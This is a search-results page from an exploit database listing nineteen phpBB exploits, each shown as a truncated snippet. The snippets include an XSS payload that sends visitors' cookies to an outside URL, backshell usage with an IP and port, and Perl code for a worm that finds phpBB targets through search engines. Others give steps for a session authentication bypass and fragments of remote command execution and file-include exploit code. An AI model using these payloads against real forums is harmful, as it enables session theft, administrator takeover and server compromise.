19 matches found
EUVD-2006-5207
Malware in sbrugna...
phpBB <= 2.0.18 Remote XSS Cookie Disclosure Exploit
Exploit for unknown platform in category web applications ==================================================== phpBB " ''style='font-size:0;color:EFEFEF'style='top:expressionevalthis.sss;'sss=i=new//Image;i.src='http://www.url.com/cookie/c.php?c='+document.cookie;this.sss=nullstyle='font-size:0;...
phpbb2013user.txt
------------------------------------------------------------------------ phpBB 2.0.13 user level exploit By : Morinex e-mail : [email protected] date : 20-03-2005 greetz : Ali7 for helping me =P , Zeltha , code , ASC and w00pie.NL Exploit not founded by me! Dunno who is the founder of this bug. T...
phpBBsession.txt
phpBB 2.0.12 Session Handling Authentication Bypass .. easy to use exploit .. YOU DON'T HAVE TO REGISTER AT THE VICTIM'S FORUM.. 1- Simply VISIT the forum using Mozilla Firefox.. and be sure that the cookie is made : 3- Close the Browser .. 2- Open the cookies.txt ..located on "C:\Documents and...
phpbb2012.txt
-------------------------------------------------------------------- Written by [email protected] -------------------------------------------------------------------- -------------------------------------------------------------------- Exploit : 2.0.x = phpbb 2.0.12 :...
phpbb <= 2.0.12 uid vuln + admin_styles.php php code injection exploit
phpbbexp.exe http://site.com/phpbb/ backshell ip backshell port coded by Malloc0 Wicked Attitude tested on phpbb 2.0.11 C:dtcphpbbexp.exe http://site.com/phpbb2/ 13.37.13.37 8888 nom du cookie recuperer : phpbb2mysql SESSION ID recuperЪ ... 06bef5092f9d369f13107684f63a3499...
phpBB2012session.txt
----------------------------------- phpBB 2.0.12 Session Handling Administrator Authentication Bypass EXPLOIT -SIMPLIFIED- - By PPC^Rebyte ----------------------------------- 03maa2005 NEDERLANDSE VERSIE ONDERAAN / DUTCH VERSION BELOW ENGLISH VERSION Status phpBB has already been informed about...
phpBB <= 2.0.10 Bot Install (Altavista) (ssh.D.Worm)
Exploit for unknown platform in category web applications ==================================================== phpBB / $ae= s//$1/; $uber=$1; $uber = s/ //g; $uber = s///g; $uber = s///g; $uber = s/wb...
Sanity.b - phpBB <= 2.0.10 Bot Install (AOL/Yahoo Search)
No description provided by source. /usr/bin/perl use IO::Socket; use LWP::Simple; @vul = ""; $a=0; $numero = int rand999; $site = "search.aol.com"; $procura = "viewtopic.php%3Ft%3D$numero"; for$n=0;$n90;$n += 10 $sock = IO::Socket::INET-newPeerAddr="$site",PeerPort="80",Proto="tcp" or next; print...
PHP <= 4.3.9 & phpBB 2.x with unserialize() Remote Exploit (compiled)
No description provided by source. // Compiled version: http://www.milw0rm.com/sploits/phpbbmemorydump.rar // Source serv.cpp is at the bottom of the page - str0ke // Notes from author: // compile with borland c++ freecommandlinetools : // bcc32 -c serv.cpp // bcc32 bbmemorydump.cpp serv.obj /...
PHP <= 4.3.9 & phpBB 2.x with unserialize() Remote Exploit (compiled)
Exploit for unknown platform in category web applications ===================================================================== PHP tested : phpbbmemorydump.exe "http://site.com/phpbb/" 30000 -cookiename=phpbb2support a.txt result: - string detected : /home/virtual/site.com/phpBB/config.php -...
phpBB 1.0.02.0.10 - admin_cash.php Remote Code Execution
phpBB 1.0.02.0.10 - admincash.php Remote Code Execution / exploit for phpBB 1.0.0 - 2.0.10 edit the b4b0.php file with the correct url to your backdoor and the correct filename for your backdoor upload it to a webserver. gcc -o b4b0-phpbb b4b0-phpbb.c ./b4b0-phpbb telnet greets to b4b0 -- evilrab...
phpBB v1.0.0 - 2.0.10 admin_cash.php remote exploit
No description provided by source. / exploit for phpBB 1.0.0 - 2.0.10 edit the b4b0.php file with the correct url to your backdoor and the correct filename for your backdoor upload it to a webserver. gcc -o b4b0-phpbb b4b0-phpbb.c ./b4b0-phpbb urltosystem phpbbdir urltob4b0.php telnet...
phpBB <= 2.0.10 Remote Command Execution Exploit (cgi version)
Exploit for unknown platform in category web applications ============================================================== phpBB param"atak"; $serv = $CGI-param"serv"; $dir = $CGI-param"dir"; $topic = $CGI-param"topic"; $cmd = $CGI-param"cmd"; print...
phpBB <= 2.0.10 Remote Command Execution Exploit (cgi version)
No description provided by source. !/usr/bin/perl wphpbb.cgi hack service: http://site/cgi-bin/wphpbb.cgi use CGI qw:standard; $CGI::HEADERSONCE = 1; $CGI = new CGI; $atak = $CGI-param"atak"; $serv = $CGI-param"serv"; $dir = $CGI-param"dir"; $topic = $CGI-param"topic"; $cmd = $CGI-param"cmd"; pri...
phpbb.php.txt
!/usr/bin/php -q 15th November 2004 : 4:04 a.m bug found by How Dark http://www.howdark.com 1st October 2004 Requirement: PHP 4.x with curl extension; Selamat Hari Raya / if !functionexists'curlinit' echo "cURL extension required\n"; exit; if $argv2 $url = $argv1; $command = $argv2; else echo...
exploit in PHPBB 2010
explode: form action="" method="post" URL до форума:input type="text" name="url" size="50" value="http://www.phpbbexample.ru/forum/"br Колличество запросов:select name="select" size="1" option value="10"10/option option value="100"100/option option value="200"200/option option value="500"500/opti...
phpBB 2.0.4 Remote php File Include Exploit
No description provided by source. // / phpBB 2.0.4 Remote AdminStyles.PHP ThemeInfo.CFG File Include / / / / Exploit made on June 2003 by Spoofed Existence / / / / Patch : http://www.phpbb.com/phpBB/viewtopic.php?t=113826 / // include stdio.h include sys/types.h include sys/socket.h include...
XSS Exploit In phpBB viewtopic.php
XSS Exploit In phpBB viewtopic.php A: BACKGROUND from phpbb.com phpBB is a high powered, fully scalable, and highly customisable open- source bulletin board package. phpBB has a user-friendly interface, simple and straightforward administration panel, and helpful FAQ. Based on the powerful PHP...